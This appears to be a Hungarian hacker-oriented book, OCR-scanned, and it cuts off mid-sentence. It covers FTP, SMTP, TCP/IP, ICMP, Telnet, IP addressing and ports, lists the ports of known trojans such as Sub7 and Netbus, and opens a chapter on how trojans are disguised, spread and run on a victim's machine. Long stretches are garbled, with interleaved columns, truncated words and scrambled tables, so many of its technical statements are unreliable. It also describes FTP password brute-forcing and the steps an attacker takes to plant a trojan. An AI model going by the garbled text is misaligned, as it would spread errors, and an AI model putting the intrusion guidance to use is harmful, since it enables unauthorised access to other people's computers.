átadja a teljes állomány utolsó adatait, a kliens vissza-Az átvitel végének ezeknek a fájloknak a fogadását. Most a szervergép Close bevezetése küld a kliensnek, amely veszi a parancsot, és elfogadja. 5. fázis: adateljárás mutatja a kontrolleljárásának (21. port) az átvi-Az átvitel bezárul. A kliens-adateljárás szintén terminál, a kontroli-lezárása azonban aktívan hagyja a további átvitelekhez.

iga

A paraméterként megadott könyvtárra vált. cd ~ Törli a New néven létrehozott könyvtárat. Is -l

er home-könyvtárára vált. Mkdir New

r New

ktuális könyvtárban található összes fájlt. chmod

elj

okat a fájlokhoz és/vagy könyvtárakhoz.

Az öt kommunikációs fázis az FTP-nél

rendelkezésre álló közel 60 parancsból itt csak a legfontosabk felsorolni:
indul az FTP-kapcsolat a hosthoz. open host Ha egy hosthoz még Ha már fennáll a

s

szükség, ahol lemez nélküli munkaállomásokat (diskless-workst tetnek, mert ezek nem tudják tárolni a logikai címüket. Bootolá tulajdonképpeni indítást értik, hanem csak a fontos konfiguráci telét.
SMTP

a felhasználó azonban már az FTP környezetben található, az open host , a felhasználó azonban még nincs bejelentkezve, a user paranccsal ASCII-re állítja az adatátviteli módot. binary Minden fájltranszfer után elhangzik egy Kapcsoló: ha a Kapcsoló: ha a cr be van kapcsolva (default), akkor a

elépíteni az említett kapcsolódást. user user

g. ascii

adatátviteli módot. bell

ED karakterek LINEFEED-re módosulnak. prompt

pcsolva (default), akkor több fájl átvitelénél minden fájl után egy interaktív

ezik.

A Simple Mail Transfer Protocol alighanem a legtöbbet haszn interneten. Az SMTP már a kezdet kezdetén a Unix-rendszer dett be, és időközben a normál PC-ken is megtalálta a helyét. A kezeli a mail-szoftverét, és itt készít elő egy üzenetet. Ha ezután netét, akkor ez annyi időre kerül a köztes tárba, amíg a TCP a (az OSI modell keretei között) átviszi. A kliensnek és a szervern parancs, illetve reakció áll a rendelkezésére, amelyeket most ne Helyette a szerver és a kliens közti kis párbeszédet mutatjuk be ver részéről mindig pozitív válaszból indulunk ki): • A kliens session-t épít fel a szerverhez. • A szerver megerősíti a szervizek rendelkezésre állását. • A kliens azonosítja magát. • A szerver azonosítja magát. • be. • A szerver a beleegyezését adja. • A kliens átküldi a címzettet. • A szerver válaszol: a postafiók elérhető. • A kliens inicializálja az adatátvitelt.

P-parancsok

k Transfer Protocol nem a TCP-re épül, mint az előbb tárgyalt UDP-re (User Datagram Protocol). Bár ez is adatok átvitelét m a végfelhasználó számára készült, mivel a kapcsolat biztosítatz átviteleknél nincsen jelszólekérdezés, csak a forrás-IP marad delkezésre álljon a szükséges tartomány. A legfontosabb parant, a mode, a get, a put, a verbose és a quit. néhány szó arról, hogyan is folyik itt az adatátvitel. A TFTP ens-szerver elvre épül. A kliens egy kérést küld a szervernek, az megkezdődik az adatátvitel. Minden adatrekord 512 bájtos, és a zza. A kliens akkor tételezi fel automatikusan az átvitel végét, ha rd 512 bájtnál rövidebb.

A kliens átadja a tulajdoképpeni parancsot, amely mail-k

• A szerver felveszi az adatokat, és a befejezéshez kéri a <crlf> csot.

• A kliens az átvitel befejezése után, ahogy megállapod <crlf><crlf> -et. • A kliens a megfelelő paranccsal befejezi a kapcsolatot. • A szerver erre service closing-gal felel.

ocol is az UDP-re (Use Datagram Protocol) épül, és tulajdonképpen ztették, hogy boot-folyamatokat aktiváljon. Erre csak ott van

ve-Server az adatbázis egy biztonsági másolatát tartalmazza a erver kiesésének az esetére. A címzett minden fogadott csomagról egy ü feladónak. amelyet eredetileg a SUN fejleszYellow Pages volt a neve). amely már nem ak a tiszta szövegküldésre. 1992 óta nagyjából csak a purpose Internet Mail Extensions) használják. amelyben azokat elkü dául minden elküldött csomaghoz egy numerikus értéket generá téknek a segítségével a két egymással összeköttetésben álló szám csomagot azonosít. Ebben a hibael funkciói segítenek. így a különböző számítótni. egy multikomputerré olvadnak össze. • Optimalizált adatfolyam . így nayes konvertereket kellett alkalmazni. hanem a legkülönbözőbb adattípusoka. • Ellenőrzés. lehetővé teszi a decentralizált userID-k. a már említ UDP (User Datagram Protocol).Windowing-nak is nevezik. . amely nagyon nagy ásokat igényelne. amely a szervertől kap adatokat. A TCP az egyik fő protokoll. is át lehet küldeni vele. elszavak központi adminisztrációját. hibafelismerés és folyamatvezérlés a kapcsolat a rocedure Calls-t akkor használják. a címzett ennek megfelelő üzenetet küld újrakéri az érintett csomagot. audió stb. Az RPC-vel a részfeladatokat specifikusan az kvalifikált számítógéphez lehet rendelni. ent egy számítógép. am egyidejű átvitelére lehet használni. Az átmenetekkel nem volt könnyű megbirkózni. Ha egyszer még elő az adatátvitelben. A NIS működtetéséhez a ponensekre van szükség: A TCP a következőkre képes: • Adatfolyam-átvitel • Virtuális full-duplex kapcsolatok • Adatfolyam-vezérlés • Hibafelismerés • Prioritásvezérlés atbázis egy túlméretezett /etc/passwd-fájlt jelenít meg a hálózat ster-Server a megfelelő domainekkel kezeli a NIS-adatbázist. • Az adatfolyamok priorizálása. ha több különböző kapacitású szádelkezésre. vagyis az adatfolyam prioritá küldése. Transmission Control Protocol (TCP) Information Services műveletek biztonsági objektumok és elérési re szolgálnak. Ez a rendszer.as években más mail-rendszereket is bevezettek. és olyan feladatot kell elvégezni. s ez igazolja az átvitel tökéletességét. gondoskodva arról. A transzport rétegben két protokoll található. hogy a fogadott adatok állapotban és sorrendben érkezzenek meg. Transzport réteg A transzport rétegnek a következő feladatokat kell ellátnia: • A kapcsolatokat ellenőrzötten kell felépíteni és bezárni. Ez az eljárás egyébként yre nagyobb figyelmet vívott ki magának a nagyvállalatoknál és a nél. • Lehetővé tenni az adatátvitelt dedikált transzportkapcsolato Multiplexing: egy kommunikációs csatorna felépítése. és a protokoll-család más tagj valamennyi adat megbízható átvitelét garantálja. A pontosabb felépítésébe itt nem megyünk bele. kompatibilitási ek fel. de nem változtatni ezeket. domain a NIS-adatbázisban leképezett számítógépek csoportja.

En és a Source Address-nek a segítségével ismerhető fel a töredékad zósága. mondhatni. megerősítéssel és egy várakozási listával (a kapcsolathoz) válaszol. a DoS-támadásokró ben többet mondunk. Ugyanúgy biztosítatlan. az adatok hosszáról. amely a TCP-nél említett tulajdonságok dicsekedhet. nszportréteg alatti rétegek tartalmaznak. Ezt nevezik p lásnak (Buffer Owerflow). A f azt jelenti. Totál Lenght: az adatcsomag teljes hossza bájtban (max. mint a TCP. ehhez persze még más fontos protokollokra is szükség van. Hálózati réteg Ez a réteg különböző protokollokat fog össze. mint azok a protokollok. Type of Service: minden bitnek csak ajánlókaraktere van. azás. Az Internet Protocol felelős az adatcsomagok átviteléért a mennyi protokolljánál. megerősítéssel válaszol. a TCP-re bízhatja a kapét. azonban közeledik a váltás a 6. az lefagyaszthatja a PC-t. és a kapcsolat felépül. Az ok. a csomagot részcso bolják. 53 161 SNMP 69 TFTP 25 SMTP 32 FTP 23 80 Protoco Header Checksum Source Address Destination Address Options Padding Data C DNS TELNET HTTP agram Protocol (UDP) Transmission Control Protocol (TCP) z UDP/TCP Version: az IP-verziót jelöli. Ebből látszik. Ezt a bonyolult folyamatot megpróbáljuk egy header-mode megmagyarázni: Version Flags | HL Type of Service Fragment Offset TTL gram Protocol (UDP) Totál Length Indent ztosítatlan protokoll. A roppant rövidre fogott: információkat tartalmaz a kiinduló rtról. például: Internet Protocol (IP) ő számítógép. hogy nem lépett-e fel súlyos hiba az adatátvitelben. 64 K Identification: egy adatcsomag egyértelmű ismertetőjele.s felügyeli. etben automatikusan megszakítja a kapcsolatot a másik számítólten átküldi az adatokat. illetve a kliens elküldi a kapcsolatra irányuló ké egy portot. A elküldött csomagokat a célrendszerben újból egyesítik reassembly néven ismertebb. Az Internet Protocol egy headerből és az azt követő adatblok többek között az adatcsomagok fragmentálásáért is felelős. és közli a UDP-header adatainak az t. illetve a szerverhez olódni. amellyel a távoli számítógéphez. verzióra. illetve a TCP-vel. ha a célszámítógép egy bizonyos idő megerősítést a fogadásukról. amelyek aktíva az adatok átvitelében. hogy milyen szolgáltatások érP-vel. megnyitása után mindkét irányba áramolhatnak az adatok. amelyet three-wayneveznek. A Pre séget nyújt a vezérlőinformációk előnyben részesítésére. amelyről később. tud adatokat továbbítani az alkalmazásoknak. hogy a TCP teljes felel a hírének. Az UDP azonban nem kéri a fogadás megerősítehát. IHL vagy HL (Internet Header Length): az IP-header hossza kokban van megadva. Ezek és a két következő mező vezérlik a reassembly-t (ld . Az UDP ezt a. ot egy három részből álló folyamat vezeti be. kis táblázat példákat mutat arra. amiért az UDP li réteghez tartozik: az IP ugyan elő tud állítani kapcsolatokat. hogy egy adatcsomag legfeljebb 65535 bájt méretű csomag ennél nagyobb. Az interneten pillanatnyilag m használják. miszerint biztonságos átviteli protokoll. mint például az Internet Explorer. egy alkalmazáscsatoló-felület az IP-hez. amelyet néh zatban (LAN) már használnak. Hogy ezt elkerüljék.

minden továbbinál egy fragmezőjének a hosszával növekszik az érték. A felesleges késleltetések elkerülése érdekében a header ela korlátozódik. hogy tékre csökkenjen. A padding feladata. Options: opcionális mező további információknak. Offset: egy adatcsomag adatbájtjait számozza.bitnek a következő a jelentése: gment: olyan hostokhoz. hogy egy adatcsomag minden umát fogadta-e. az internetprotokoll igazán komplex. Itt van feljegyezve a küldő száme. Address: a célállomás internetcíme. és a headerben nincs feljegyezve indulási uter úgy dekrementálja (kicsinyíti) a csomagot átfutáskor. Ekkor a következő router már nem veszi fel. amelyet például az interneten talál meghajtó egymagában nem képes arra. meg kell delt ULP (Upper Layer Protocol) protokollt. • Padding: kitöltő bitek. logikai c tárolni. • gments: hogy kiderüljön. hogy bináris null re egészítse ki a frame-et. Sok kódot kiegészítésekhez terveztek. A legfontosabbak: • Record Route: naplózza az adatcsomag útját. Az opciók mindenekelőtt a hálózati bakeresést és a méréseket szolgálják. A RARP az ARP-vel ellenkező irányban működik. hogy hiányoznak-e töredékek. Itt van feljegyezve a fogadó címe. A fontos ULP-k: Leírás ICMP (Internet Control Message Protocol) 3 TCP EGP UDP (User Loose Source Routing: a küldőállomás előír néhány közb • Strict Source Routing: a küldőállomás minden közbeeső állo • Timestamp Option: az IP-címe helyett. Mivel az időmérés meglematikus a hálózatban. lően kell alakítani az ellenőrzőszámot. akárcsak a record r den gateway a feldolgozás időpontját jegyzi be. amelyben tartós. és kiosztja a fragAz első fragmentum offset O-t kap. ress: a forrásállomás internetcíme. amely tartalmazza Ezt a módszert tulajdonképpen csak olyan számítógépeknél ha lyeknek nincs olyan adathordozójuk. Tehát a logikai címet a fizikai címre kell cserél az ARP. Ez egy headerből és az ARP-csomagból áll. Ezáltal teljesül a 1 6 bites ás. Ennek az értéknek a dja a címzett megállapítani. a host egy RARP-kérést küld a f amire azután a RARP-szerverek a hálózatban átnézik a saját refe taikat. Mivel a TTL-érték (Time tleg a flag és a flag offset értékei is minden routernél változnak. az lamikor el lesz távolítva a hálózatról. például huroknál. hogy a logikai címén számítógépet. címből állítaná elő a fizikait. Routolási hibánál. de mindez az adatok átvitelét szolgálja. mivel semmilyen módon nem áll összeköttetés hardvercímével. e (TTL): Minden csomagnak van egy előre megadott maximális mit itt lehet megadni. Mint látjuk. és ezért mindig csak a fizikai cím ismeretével bootolnak . Address Resolution Protocol (ARP) -to-Gateway Protocol) 6 Control Protocol) 8 col) ay Protocol) 17 P-k Egy hálózatban minden számítógépnek van egy. A számítógépes kommunikációhoz azonban n nem logikai címet használnak. Ahelyett. Reverse Address Resolution Protocol (RARP) ecksum: az IP-header ellenőrzőszáma. és tartalmaz adatokat a logikai forrás-protokollcímhez és a fizikai címhez is. amelyek nem támogatják a álást. és egy RARP-választ küldenek vissza. a firmware á niált fizikai címe. Mivel a különböző protokollok az IP-re támaszkodnak.

ehhez a Telnet egy terminált szimulál (szöveg. . a szerver üdvözöl. lejjebb). 2.exe sort. és az adatok visszajönnek a számítógépre. azonban kotórésze. Beírjuk a következőket: • Hostnév: meine-domain. 11. Ez az a név. Adjuk meg a login-nevünket.1 A Telnet aüzenetekről. Most a szerver a jelszót akarja tudni. A szokásos módon tárcsázzunk be a szolgáltatónkhoz. A fő cél egy szabványos módszer létrehozás keken alapuló folyamatok összekötésére. Megjelenik egy pá 7. Kattintsunk a Kapcsolatra. Windows 95/98 (és magasabb verzió) alatt kattintsunk a Sta mire megjelenik egy kis párbeszédablak. 8 bit/bájt-orie kációs lehetőséget nyújtani. mintha maga is egy fölérendelt protokoll lenne. 5 Paraméter Problem: Paraméter-probléma. ány alkalmazás és protokoll használata és ztonságosságuk 9. A Telnetet az RFC 854 (Request for Comment. Váltsunk vissza a Telnet-re. 3. Ez ugyanaz a folya FTP-nél.ietf.de uest 18 ly iós üzeneteinek a listája • Csatlakozás: telnet • terminál típus: vt 100 8. az internetfejles kafeljegyzése. 10. 5. protokolloknak a használata és a lehetséges biztonságosságuk telei a hackerek cselekményeinek.ontrol Message Protocol (ICMP) eladata az üzenetek. 3.3. Most megjelenik: Welcome. 4. a Telnet elindul. például a hibaüzenetek közvetítése. amelyet az FTPlunk (ld. n megfelelően módosul. Kattintsunk a Hálózati rendszer kapcsolatra. Kattintsunk az OK-ra. Ugyanaz IP-t. A Telnet tehát lehetővé teszi a felhasználóknak.org/) a következőképpen defini protokoll célja egy általános. gra Windows alatt egy Telnet-kapcsolat a következők szerint épü eteinek listája az információs üzenetekről: 1. eírás cho reply 8 Time est 16 17 6. és parancsokat hajtassanak végre mítógépeken. a Telneten keresztül programokat is el lehet rendszereken. 11 Time exceeded: a timer puffer-erőforrások elhasználva. amelyeket az ICMP küld: eírás estination unreachable: a célállomás nem érhető el. Sőt. 12. mindkét irányra kiterjedő. http://www. Ezután nyomjuk le az Enter-t. és készen áll. hogy távoli s jelentkezzenek be az interneten. 4 -elterelés. Gépeljük be a telnet.

2. akkor a szerver hibakóddal válaszol. amiért nem látjuk. Az FTP-t az for Comments. nagyon könnyen megszerezheti a fiókadatokat. porton keresztül teszi fel. Az Anonymus FTP-nél bárki bejelentkezhet a sze névként többnyire Anonymus-t. Egy kapcsolat létrehozásához.rtassuk magunkat. Jelszótámadások Az FTP igen alkalmas a jelszavak kipróbálására. Ha valak login-nevet ad meg. hogy minden adatot kódolatlan szövegként visz át. egy betolakodó. b3$ stb. szervereknél ki lehet találni az érvényes login-neveket. a szerek fájlrendszerei közötti strukturális különbségekből adódó vesződolása és 4. FTP-szervernek. távoli számítógépek mplicit (programokon keresztüli) használatának az elősegítése. . Az FTP biztonsága Az FTP nem túl biztonságos protokoll. Bár az FTP-t egy vetlenül is lehet használni. ubis2$. jelszó). mivel a szabvá cióban nincs korlátozás a jelszavak beírására. amit írunk. illetve FTP da futnia a célszámítógépen. Az FTP-nek két fajtája van: a User-FTP és az Anonymus-FTP nél a felhasználónak a login-nevével és a jelszavával kel bejentkeznie. mert általa a programok vagy a d minden internet-felhasználó számára elérhetők. Ezt a támadást Brute Force-rohamnak is nevezik. Az A fontos szolgáltatás az interneten. A parancssort lehet látni. ha beleolvas a omba. a jelszó beírása ható. tehát akárhányszor m a jelszót. pl. Mivel a Telnet felhasználóazonosítást kíván (loginnév. elsősorban programokon keresztüli hasznáék. adatátvitel egy FTP kliensen keresztül történik. 3. Felépül a Telnet-kapcsolat A Telnettel az az egy gond van. biztonsági kézikönyv) így mutatja be: Az FTP fel(programok és/vagy adatok) közhaszmú átvitele. adatok megbízható és hatékony átvitele. s különbözőképpen tá a legfontosabb támadási formák. A kliens egy kérdést küld a távoli számítógép FTP Ezt a kérdést a 21. ilyen például a y a WS_FTP. lehet írni a parancsokat. FTP ávoli rendszerek közötti adatátvitel egyik módszere. és jelszóként egy e-mail-címet k zel az FTP-szerver nyilvános részéhez kapunk hozzáférést. pcsolatban vagyunk a szerverrel. A CuteFTP felülete e még egyszer az Enter-t.

net). eltöltés jelszófájlt. amelynél a 32 bit 8 bitekre van felosztva. amelyeket a chat-en mondott nekik ajtsanak. hogy egy ügyfél a szolgáltatójától kapja ges IP-címet. Többrésztvevős valós idejű konferenciákat tesz lehetővé. miközben a hálózatok üzemeltetői időbeli kül. az IP-címmel érhető el. . többnyire a p írásmódot használják. pl. Eszerint egy IP-cím négy bájtból áll: 11000010 194 Pl: 11000010 128 1 1 1 0 0 0 1 01001101 77 64 01111100 124 16 32 8 4 álóan alkalmas a Social Engineering-re.ripe. amelyek a segítségére lehetnek a további támadás veszélyt jelenthet a fájlcsere is.net/) felelős az IP-címek kiosz Hogyan néz ki egy IP-cím? A jelenleg használt IP-protokoll az IPv4. De az IRC-parancsokból is sok információt tudhat me felhasználóról. ami azt jelenti. Leginkább az újoncok vehogy bizonyos parancsokat.4 Az IP-címzés IRC ternet Relay Chat) az e-mail mellett az egyik legkedveltebb szolerneten. IRC-felület A címzés az interneten az IP-címzésen alapul. szervertől függően (IRC szerver. ahol mindig szívesen küldenek t rusokat (ld. a trójaiaknál). Egy támadó elküldetheti például e-mailben magának a Minden kvadráns egy 0 és 255 közti számot reprezentál.euirc. irc. A rosszul konfigurált kliensprog több elérést engednek meg a szervereknek a helyi erőforrásokra mint amennyi tanácsos volna. A legismertebbek közé tartoznak hC és a pIRCh. erverre lehet Anonymus-belépéssel szoftvert feltölteni (upload). íg szegmenssel elméletileg több mint négymilliárd (pontosan: 4 29 met lehet kezelni. Minden IP-cím 32 vel az ilyen számkombinációk igen körülményesek.ffing TP kódolatlan szövegként továbbítja az adatokat. Egy módon manipulált szoftvert helyezhet el a szerveren (vírus. blokkokban kölcsönzik IP-címeiket. A beszélgetésekhez ma már kliens valamelyikét használják. trójai). A legnagyobb veszélyt azonban maguk ve a szerverprogramok jelentik. mális számként írják le. 3. az IP Numbering Autho pában a RIPE (http://www. Az IP-címek archikus. a szolgáltató megintcsak a hálózattól kölcsönz amelyre csatlakozik. felhasználók. felhasználói adatok birtokába juthat. Erről a óló fejezetben további részleteket tudhatnak meg.3. a bb csatornákon (channels) lehetnek. Az interneten rás egy egyértelmű számmal. ha egy betörő lózati forgalmakba.

és C. önállóan a hozzájuk utalt címtartományokat. szegmens észen kiosztva kapják. Ezen az B-osztályú hálózat ugyancsak egy internetre kapcsolódó intranet 172.0 és x.x. mivel a szabad számkészlet mindig kisebb lesz.x. Néhány ilyen csatolófelületet biztosan minden felhasznál .x-ig hálózaton belüli IP-címeket csak az intraneten belül lehet routolni.bbb. és a maradék 16 bitet adhatják ki maguk (ez 254-ig.xx broadcast-címként szolgál (ezzel az értékkel érhető el egy subnet minden sz Minden IP-cím. C-osztályú hálózatokon 255. amelyre információk tudnak bejön menni.x.x.168. amely a 90-es évek elején átvette az elését. A C- címek kiadása.x. amelynek ez az első szegmense. 10. belüli IP-címeket csak az intraneten b Az 1. Ezért van be állni.x.oszt m kvadránsban megint a teljes értékterület tartozik 0-255-ig. 224.31.x255. és tok tulajdonosainak az első három szegmenst (aaa. 172. aaa. A B-osztályú hálózatok tulajdonosai a két első negyedet 65536 különböző IP-címet jelent egy B-osztályú hálózaton belül).ti osztályok kiderült. Leírás Az A-osztályú hálózatok az első negyedben 1 és 126 közötti értékeket A-osztályú hálózatok tulajdonosai az InterNIC-től (ami most is minden A- Címek x.x. Az A-osztályú hálózatokat azonban mára már mind kiosztották. E B-osztályú hálózatokon belüli IP-címeket cs Ez a 256 C-osztályú hálózat u ot kezel) kapják az első negyedet.255 Leírás Minden IP-címben a negyedik szegmensben a 0 és 255 érték szertől függően zárolva vannak. az InterNIC-től függetlenül. így a négymilliárd elméletileg rendelkezésre álló IP-c már csak egy „töredéke" marad. amelyben egy IP-cím a mostani 32 bit helyett 12 yú hálózatok Foglalt IP-címek -címek van. internetre kapcsolódó intra-00192.x) negyedikről szabadon rendelkezhetnek (ez kiszámolva 256 különböző meghatározott hálózatot sem definiálnak és több cím biztosítják az adatcsomagok egyidejű átvitelét.255-ig routolni. amelyet a szolgáltatók nem oszthatnak ki.x.x.x-i intraneten belül lehet routolni. és a második negyedben van a 0-255-ig ékterület. Így jöttek létre a hálózati osza. 192. az Ipv6 IP-címzési rendszer. gfelelően a négymilliárd IP-címet ismét három osztályba sorolés C-osztályú hálózatokba.16.x A B-osztályú hálózatok első net helyi gépei számára van fennt k ki. TCP/IP viss Ez az A-osztályú há hurokként szolgál.ccc.x239. hogy négymilliárd IP-címet nagyon nehezen tud egyetkezelni.x internetre kapcsolódó intranet helyi gépei számára van fenntartva.x.x. ezér magyarázat következik. x. mert más célokat 3.x.x. egyetlen x.x). a 0 a subnet megnevezésé alatt a negyedik negyedben minden gépet értünk 1 -254-ig). amelyek. Már ma is szűkösen megy a B.x. A C-osztályú hálózatok első negyedében 192-223-ig vannak értékek.bbb. amely a további szövegek jobb megértésé A port egy csatolófelület.x.x. a 255 a negyed 127. TCP/IP-installációk tesztelésére szolgálnak a számítógépe pinggel egy tetszőleges 127-es címre).4 Aportokról Ebben a könyvben gyakran találkozunk a port fogalmával. az egyes IP-címterek kezelését nemzeti NIC-eknek és knak adta át.x-ig 240.bbb. Ezeket időnként D-osztálynak i A jövőbeli fejlesztésekhez zárolva vannak még az 1. negyed értékek 224-239-ig a multicast-címe -191-ig vannak értékek.x. ntesítés céljából az InterNIC. és az IP-cím fennmaradó 24 bitjét at létesíteni az interneten. amelyekben csak az első negyedet határozza meg egy ék háromnegyedet szabadon lehet kiadni.x.168.x gépei számára van fenntartva.

de rendszerint mindenki használhatja őket. ez a port tehát nyitott. tehát vannak a Linuxnak.iana. errendszer szintén különféle portokat kínál az interneta különböző szolgáltatásokhoz. és gyakran bizonyos szervizekhez vezve. 5536 port van. Itt azonban nem fizikai. Portjai minden olyan operációs rendszernek ly támogatja a TCP/IP-t. kié egy weboldal) 53 kereséséhez) 66 (World Wide Web) 110 jeinket 137 (információk egy felhasználóról. itt kérjük le a Netbios Name Service (hálózati PC-k nevei) 138 Netbios Datagramm Service (Adatforgalom a hálózatban) 139 Session Service (a nukerek is ezt használják) Netb A legfontosabb portok áttekintése Valamennyi port listája a http://www. Az 1-1023-ig portok a standard. A manipulált adatdéséhez általában adott portokat használnak. után a monitor vagy a nyomtató jelenti.ilyen például a 7tf Sphere (www. a Unixnak és a BeOs-nak is. .org/assignments/ numbers weboldalon található. désre vár. használhatják.hackerzbook.de) -. ortok komoly biztonsági hiányosságokat is jelentenek a rendszen a portokon keresztül az avatott hackerek be tudnak törni az szerbe. Egy portszkennelés eredménye A következő táblázat néhány fontos portot ír le: Port 21 25 Leírás FTP (File Transfer Protocol) 23 Telnet (Service. Ezeket a portokat számokkal jelölik. E-maileket például a Simple Mail Transfer TP)-on keresztül küldünk. A mail-szolgáltatás ennek megfelelőwn portok szabványa szerint. Ezek a közkedvelt szervizeknek vannak fennzerint csak az arra jogosult felhasználók érhetik el őket. ezeket más aját készítésűek is. Megfelelő védőmechanizmusok nélkül az ilyen bnyire a számítógép lefagyásához vezetnek. kkor nyitott. Simple Mail Transfer Protocol) 43 SQL * Net (SQL Server Port) 79 (utánanézni. akkor ez porton vár kérdésre. Ha egy FTP szervert telepítünk a rendszerre. A minollok megfelelő porthoz rendelésével kapcsolatos információkat teg tartalmazza. illetve rossz szándékú támadások agy fogadhatók. nem pr Domain Name Server (DNS nev Finger SMTP (mailküldéshez. számú portjával. például hogy vannak-e mail-jei) 80 POP3 (Post Office Protocol 3). ok/ról/on káros adatcsomagok. hanem erportokról van szó. a 25. így pélő egy weboldal letöltésekor automatikusan kapcsolatot létesít a rver 80. ha egy program ezen a porton egy kérésre (request). A nagyobb portokat dinamikus vagy privát portoknak nevezik. Ez a port bocsátja rendelkezésre a Webhez szükséges HTTP kommunikációs protokollt. t portok az 1024-49151 portok. portszámról megy. s a megfelelő szolgramhibáira építenek. illetve statikus Well known portok.ik például az egér és a billentyűzet mint adatbeviteli eszközök. és az portok lezárása egy tűzfallal. Ezért ajánlatos a rendszer gyakori vizsgálata egy el .

secure. ezért most felsoroljuk a legismertebb trójaiak legfontosabb portjait. .A portokat a trójaiak is használják.de címen kapunk pontos listát.un. Port 2140 Throat 30129 Paradise 5400 12361 12345 Netbus 2 Pro 21544 Régi Back Orifice (BO) 1243 Régi Sub 7 27374 30100 Hackers Paradise Sub7 Netsphere 456 Trójai Deep Throat 6670 Deep Masters Blade Runner Whack A Mole 20034 Girlfriend Netbus 31337 Deep Throat 6771 A trójai portok Az összes ismert trójai portról a http://www.

2.2.3 A trójaiakat az ICQ-val is tovább lehet adni 4.4 4.5 4.4 Módszerek az Explorer.6 További terjesztési stratégiák 4.5 A lemezek majdnem ugyanígy működnek 4.6.3.6 Sub7 .3.Tartalom 4.5.3 Windows-Registry ez már izgalmas 4.Hálózati eszköz vagy támadás a Microsoft ellen 4. és vezérli a szervert 4.3 Hogyan szerzik meg a hackerek az IP-t? 4.3.4. Miből 4.1 A BO2K és összetevői Így ismerjük fel a trójait a rendszerünkben 4.6.6.6.1 A szerver kiosztása 4.3 Így álcázzák és terjesztik a trójaiakat 4.2 A kliens otthon marad.1 A trójaiakat fájlokba integrálják 4.és trójai-szkenner 4.1 Vírus.egy trójai rémisztő lehetőségekkel 4.5 A runonce.3.4.exe-vel a C:\ meghajtóra 4.1 4.3.2.1 Támad a Sub7 BackOrifice 2K .exe kicserélése áll egy trójai? .2 AutoRun bejegyzések 4.7 Mit csinálnak a hobby-hackerek a trójaiakkal? 4.3.6.4 Elég egy CD és az automatikus lejátszás funkció 4.2 Álcázás a WinZip-pel 4.3. fejezet .2 A történelmi minta.

amelybe meg nem engedett kódot ágyaztak . A hackernek meg kell kapnia a fertőzött PC aktuális IP-címét. és Trója kapuja elé állíttatta. Trója elesett . Építtetett egy hatalmas falovat. Csak akkor lehet egy (internetes vagy hálózati) kapcsolaton keresztül az IP-cím segítségével az idegen számítógépet elérni. Ez a kapcsolat manapság legegyszerűbben az interneten vagy egy hálózaton keresztül valósítható meg.2. de az engedélyezetlen kódja alapján olyan funkciókat is elvégez. a trójaiak isteni jelképét. De a ló belseje a legerősebb és legbátrabb görög harcosokat rejtette. 4. telepíteni kell a szervert a cél-. álcázást használ. amely a város közelében rejtőzött. amelyekről a fertőzött rendszer felhasználójának nincsen tudomása. Jóval komplexebbek azok a programok. Különböző műveleteket hajt végre. hogy a hacker megpróbálja elhelyezni vagyis „szórni" a szervert a célrendszereken. Úgy képzelhető el. Az RFC 1244 (Site Security Handbook) így írja le a trójait (a szerző fordítása): Trójai lehet egy program.ilyenkor a program a trójai program hordozója- . * A felhasználót rá kell venni arra. Ez a tipikus feladata egy keylogger-nek. ha a szerver .tehát az eredeti program megváltoztatása. Mindig valami váratlant tesz. hogy egy számítógép vagy annak az adatai elérhetővé váljanak. hogy ostrommal nem tudják bevenni. és kinyitották a város kapuit a görög seregnek. Itt mutatkozik meg a trójaiak és a klasszikus távkarbantartó programok hasonlósága. amely lehetővé teszi az idegen számítógép „távirányítását". Még egy kicsit világosabban leírva: a trójai egy meg nem engedett kód egy legitim programon belül . a görög Odüsszeusznak támadt egy ötlete. hogy el is indítsa a szervert. A trójai lehet egy hasznos program. és önfeledten ünnepeltek. hogy miből is áll egy trójai. 4. mégis mérhetetlen károkat okozhat. például a tudtunk nélkül jelszavakat lop vagy fájlokat másol.1 A történelmi minta Bizonyára mindenki ismeri a homéroszi történetet: Párizs. Az elérés csak akkor jöhet létre. amely információkat közvetít úgy. amelyekről a fertőzött rendszer felhasználója mit sem tud. amelyek nemcsak adatokat küldenek el. az kiderül a továbbiakban a különböző trójai programok leírásából. amely valami hasznosat vagy csak valami érdekeset csinál. A legegyszerűbb formájában a trójai egyszerűen egy kémprogram lehet. hogy a számítógépünkre került. Amikor látták.mint program aktív. A hacker ilyenkor többnyire a következő problémákkal szembesül: • A szervert el kell juttatni a felhasználóhoz. amely látszólag hasznos funkciókat hajt végre.2 Miből áll egy trójai? Először is tudni kell. hogy a bevitt adatokat egy előre megadott e-mail-címre küldi a következő online-kapcsolatnál. Erre a görögök évekig ostromolták eredménytelenül Trója városát. amelyről azt sem tudjuk. Azonban a trójai és a származási helye között minden esetben kapcsolatnak kell lennie. Hogy az akciók lehetőségei milyenek lehetnek. illetve áldozat PC-re. Ezután a görögök visszahúzódtak. azaz „rá kell sózni". A trójaiak a biztos győzelem tudatában bevontatták a lovat a városba. ha a fertőzött számítógépet az IP-címén keresztül sikerül megszólítania. De lehet egy olyan program is. Hogy a trójai eltitkolja az elhelyezését. a trójai király megszöktette a szépséges görög Helénát.A trójaiak 4. vagyis egy keyboard logfájlt készít. amely egy fájlba naplózza felhasználói beviteleket. amelyek távoli számítógépek hálózaton vagy telefonvonalon keresztüli kezelését teszik lehetővé.a hackerek pedig a magukévá tették a trójai faló ötletét. Trójainak tehát egy szoftvert nevezünk. hanem a számítógép távirányítását is lehetővé teszik. ként működik. akárcsak a görög katonák. A szerver a központi program.1 A szerver kiosztása Ahhoz. hogy később egy klienssel célzottan érhesse el a kitelepített szervereket. akik azután éjszaka kimásztak a ló hasából.

dinamikus IP-címet kap. de kártékonyak is (adatok törlése) vagy kémkedők (adatok átadása). és a háttérben aktív legyen. és vezérli a szervert Ha egy trójai távirányítási funkciókat kínál. mert nem lehet tudni. de nem leéli feltétlenül annak lennie.2 A kliens otthon marad. az IP-keresés viszonylag egyszerű. illetve az internetre lép. Ez megnehezíti a trójai szerver elérését. válogatás nélkül címeket szkennelni. A szerver futtatása általában két lépésből áll. ha mondjuk átvitel közben IRC-n vagy ICQ-n keresztül. Ez így nagyon egyszerűen hangzik. Ez az eset is mutatja. Ez a lépés többnyire az elhelyezéssel egybekötve történik. hogy maga a hacker is online legyen a megfelelő időben. Egy programozó hozzáfért egy fejlesztői géphez. így nem keletkeztek jelentősebb károk. megváltoztatta az Fpinget úgy. a szerverfájl mindjárt el is indul. tehát amikor fennáll a kapcsolat a fertőzött számítógéppel. az a támadótól függ. Ha a szerver automatikus értesítésre van beállítva. Az egyik legismertebb eset egy 